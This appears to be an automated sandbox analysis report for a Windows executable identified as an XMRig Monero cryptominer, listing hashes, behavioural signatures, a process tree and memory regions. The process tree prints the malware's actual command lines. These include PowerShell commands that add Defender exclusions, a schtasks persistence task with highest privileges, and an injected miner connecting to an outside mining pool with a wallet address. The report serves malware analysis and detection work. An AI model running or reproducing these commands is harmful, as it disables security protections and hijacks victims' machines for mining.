Analysis

  • max time kernel
    40s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10-11-2022 20:08

General

  • Target

    19a474356662325b2059630216338194.exe

  • Size

    1.1MB

  • MD5

    19a474356662325b2059630216338194

  • SHA1

    5537672751a37401bccf455f651d564bb314a924

  • SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

  • SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • SSDEEP

    24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe
    "C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:844
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp734D.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1340
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:548
      • C:\ProgramData\WindowsMail\AVPTQBAEW.exe
        "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:108
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:432
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"
            5⤵
            • Creates scheduled task(s)
            PID:1720
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1364
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1300 -s 2032
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1048

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • C:\ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • C:\Users\Admin\AppData\Local\Temp\tmp734D.tmp.bat

    Filesize

    149B

    MD5

    7b3877684d54415d8fb7e47bd9d8bc9d

    SHA1

    143808c89105e4eeb673113d72628a7a4db7a11b

    SHA256

    d847b0618f36f1a3154f35e47c9e398cbfb3a33c79d063a521b9e24c17bb9d6d

    SHA512

    e641e8de94d3a9383cb27160eecaf448d86e9f6eb78bef3155457d37e3f3c15dc00a4a0af963a91c82415326979fa6a9cbf270afa454e0335555359c47fdd58b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    55bd36a4e83afe2a72ecce91f2b99043

    SHA1

    eff23101eb684d6b6d401fca1d8610bc508aba1f

    SHA256

    ccbbc4c06b9602ad478e99daf743ae036d70e9a060040a73939488013fee5687

    SHA512

    8f93499aa1c0de5fee750662e00d14baec74505a0daf511d6d59136466fe0c00fcbd7244d22d73845304b96731e182a109848631722dd72f67264255f9ef292c

  • \ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • \ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • \ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • \ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • \ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • \ProgramData\WindowsMail\AVPTQBAEW.exe

    Filesize

    1.1MB

    MD5

    19a474356662325b2059630216338194

    SHA1

    5537672751a37401bccf455f651d564bb314a924

    SHA256

    8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61

    SHA512

    d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4

  • memory/108-120-0x000000001B720000-0x000000001BA1F000-memory.dmp

    Filesize

    3.0MB

  • memory/108-123-0x00000000026A4000-0x00000000026A7000-memory.dmp

    Filesize

    12KB

  • memory/108-119-0x00000000026A4000-0x00000000026A7000-memory.dmp

    Filesize

    12KB

  • memory/108-118-0x000007FEEC040000-0x000007FEECB9D000-memory.dmp

    Filesize

    11.4MB

  • memory/108-115-0x000007FEECBA0000-0x000007FEED5C3000-memory.dmp

    Filesize

    10.1MB

  • memory/108-124-0x00000000026AB000-0x00000000026CA000-memory.dmp

    Filesize

    124KB

  • memory/108-110-0x0000000000000000-mapping.dmp

  • memory/432-114-0x0000000000000000-mapping.dmp

  • memory/548-81-0x0000000000000000-mapping.dmp

  • memory/844-85-0x000000000282B000-0x000000000284A000-memory.dmp

    Filesize

    124KB

  • memory/844-74-0x000007FEFBE81000-0x000007FEFBE83000-memory.dmp

    Filesize

    8KB

  • memory/844-73-0x0000000000000000-mapping.dmp

  • memory/844-83-0x0000000002824000-0x0000000002827000-memory.dmp

    Filesize

    12KB

  • memory/844-84-0x0000000002824000-0x0000000002827000-memory.dmp

    Filesize

    12KB

  • memory/844-82-0x000007FEF5BF0000-0x000007FEF674D000-memory.dmp

    Filesize

    11.4MB

  • memory/844-77-0x000007FEED150000-0x000007FEEDB73000-memory.dmp

    Filesize

    10.1MB

  • memory/1048-162-0x0000000000000000-mapping.dmp

  • memory/1300-102-0x000007FEFF450000-0x000007FEFF57D000-memory.dmp

    Filesize

    1.2MB

  • memory/1300-134-0x000007FEFD750000-0x000007FEFD786000-memory.dmp

    Filesize

    216KB

  • memory/1300-135-0x000007FEFCA60000-0x000007FEFCABB000-memory.dmp

    Filesize

    364KB

  • memory/1300-133-0x000007FEFAD10000-0x000007FEFAD37000-memory.dmp

    Filesize

    156KB

  • memory/1300-132-0x000007FEFD210000-0x000007FEFD235000-memory.dmp

    Filesize

    148KB

  • memory/1300-87-0x0000000000000000-mapping.dmp

  • memory/1300-131-0x000007FEF9080000-0x000007FEF90F1000-memory.dmp

    Filesize

    452KB

  • memory/1300-130-0x000007FEF9010000-0x000007FEF9074000-memory.dmp

    Filesize

    400KB

  • memory/1300-91-0x000007FEFB3B0000-0x000007FEFB41F000-memory.dmp

    Filesize

    444KB

  • memory/1300-92-0x000007FEFB200000-0x000007FEFB29C000-memory.dmp

    Filesize

    624KB

  • memory/1300-93-0x000007FEFF760000-0x000007FEFF7C7000-memory.dmp

    Filesize

    412KB

  • memory/1300-94-0x00000000773E0000-0x00000000774DA000-memory.dmp

    Filesize

    1000KB

  • memory/1300-95-0x000007FEFE7A0000-0x000007FEFE83F000-memory.dmp

    Filesize

    636KB

  • memory/1300-98-0x000007FEFEFC0000-0x000007FEFF031000-memory.dmp

    Filesize

    452KB

  • memory/1300-97-0x000007FEFD550000-0x000007FEFD5BC000-memory.dmp

    Filesize

    432KB

  • memory/1300-96-0x00000000774E0000-0x00000000775FF000-memory.dmp

    Filesize

    1.1MB

  • memory/1300-99-0x000007FEFB100000-0x000007FEFB1F7000-memory.dmp

    Filesize

    988KB

  • memory/1300-100-0x000007FEFE940000-0x000007FEFEA1B000-memory.dmp

    Filesize

    876KB

  • memory/1300-101-0x000007FEF5370000-0x000007FEF5D5C000-memory.dmp

    Filesize

    9.9MB

  • memory/1300-129-0x000007FEFE840000-0x000007FEFE88D000-memory.dmp

    Filesize

    308KB

  • memory/1300-103-0x000007FEFD800000-0x000007FEFDA03000-memory.dmp

    Filesize

    2.0MB

  • memory/1300-104-0x00000000000E0000-0x0000000000123000-memory.dmp

    Filesize

    268KB

  • memory/1300-106-0x0000000000A80000-0x0000000000D32000-memory.dmp

    Filesize

    2.7MB

  • memory/1300-105-0x000007FEFBC70000-0x000007FEFBCC6000-memory.dmp

    Filesize

    344KB

  • memory/1300-107-0x0000000000A80000-0x0000000000D32000-memory.dmp

    Filesize

    2.7MB

  • memory/1300-108-0x0000000000A80000-0x0000000000D32000-memory.dmp

    Filesize

    2.7MB

  • memory/1300-109-0x000007FEF6960000-0x000007FEF6A8C000-memory.dmp

    Filesize

    1.2MB

  • memory/1300-128-0x000007FEF12E0000-0x000007FEF1342000-memory.dmp

    Filesize

    392KB

  • memory/1300-127-0x000007FEF12C0000-0x000007FEF12DC000-memory.dmp

    Filesize

    112KB

  • memory/1300-126-0x000007FEFCC40000-0x000007FEFCC57000-memory.dmp

    Filesize

    92KB

  • memory/1300-125-0x000007FEFCD90000-0x000007FEFCDB2000-memory.dmp

    Filesize

    136KB

  • memory/1300-122-0x000007FEFD7E0000-0x000007FEFD7FF000-memory.dmp

    Filesize

    124KB

  • memory/1300-121-0x000007FEFF830000-0x000007FEFF907000-memory.dmp

    Filesize

    860KB

  • memory/1300-116-0x000007FEFB9A0000-0x000007FEFBBB5000-memory.dmp

    Filesize

    2.1MB

  • memory/1340-75-0x0000000000000000-mapping.dmp

  • memory/1364-136-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-160-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-156-0x0000000140343234-mapping.dmp

  • memory/1364-146-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-145-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-143-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-141-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-139-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1364-137-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1720-117-0x0000000000000000-mapping.dmp

  • memory/2016-65-0x000007FEF5D60000-0x000007FEF674C000-memory.dmp

    Filesize

    9.9MB

  • memory/2016-60-0x00000000774E0000-0x00000000775FF000-memory.dmp

    Filesize

    1.1MB

  • memory/2016-72-0x000007FEF6C20000-0x000007FEF6D4C000-memory.dmp

    Filesize

    1.2MB

  • memory/2016-76-0x000007FEFD7E0000-0x000007FEFD7FF000-memory.dmp

    Filesize

    124KB

  • memory/2016-78-0x0000000001030000-0x00000000012E2000-memory.dmp

    Filesize

    2.7MB

  • memory/2016-79-0x00000000004E0000-0x0000000000523000-memory.dmp

    Filesize

    268KB

  • memory/2016-70-0x000007FEFBC70000-0x000007FEFBCC6000-memory.dmp

    Filesize

    344KB

  • memory/2016-69-0x000007FEFD800000-0x000007FEFDA03000-memory.dmp

    Filesize

    2.0MB

  • memory/2016-68-0x000007FEFF450000-0x000007FEFF57D000-memory.dmp

    Filesize

    1.2MB

  • memory/2016-63-0x000007FEFB060000-0x000007FEFB157000-memory.dmp

    Filesize

    988KB

  • memory/2016-67-0x00000000004E0000-0x0000000000523000-memory.dmp

    Filesize

    268KB

  • memory/2016-71-0x0000000001030000-0x00000000012E2000-memory.dmp

    Filesize

    2.7MB

  • memory/2016-61-0x000007FEFD550000-0x000007FEFD5BC000-memory.dmp

    Filesize

    432KB

  • memory/2016-66-0x0000000001030000-0x00000000012E2000-memory.dmp

    Filesize

    2.7MB

  • memory/2016-62-0x000007FEFEFC0000-0x000007FEFF031000-memory.dmp

    Filesize

    452KB

  • memory/2016-59-0x000007FEFE7A0000-0x000007FEFE83F000-memory.dmp

    Filesize

    636KB

  • memory/2016-58-0x00000000773E0000-0x00000000774DA000-memory.dmp

    Filesize

    1000KB

  • memory/2016-57-0x000007FEFF760000-0x000007FEFF7C7000-memory.dmp

    Filesize

    412KB

  • memory/2016-56-0x000007FEFB160000-0x000007FEFB1FC000-memory.dmp

    Filesize

    624KB

  • memory/2016-55-0x000007FEFB340000-0x000007FEFB3AF000-memory.dmp

    Filesize

    444KB

  • memory/2016-64-0x000007FEFE940000-0x000007FEFEA1B000-memory.dmp

    Filesize

    876KB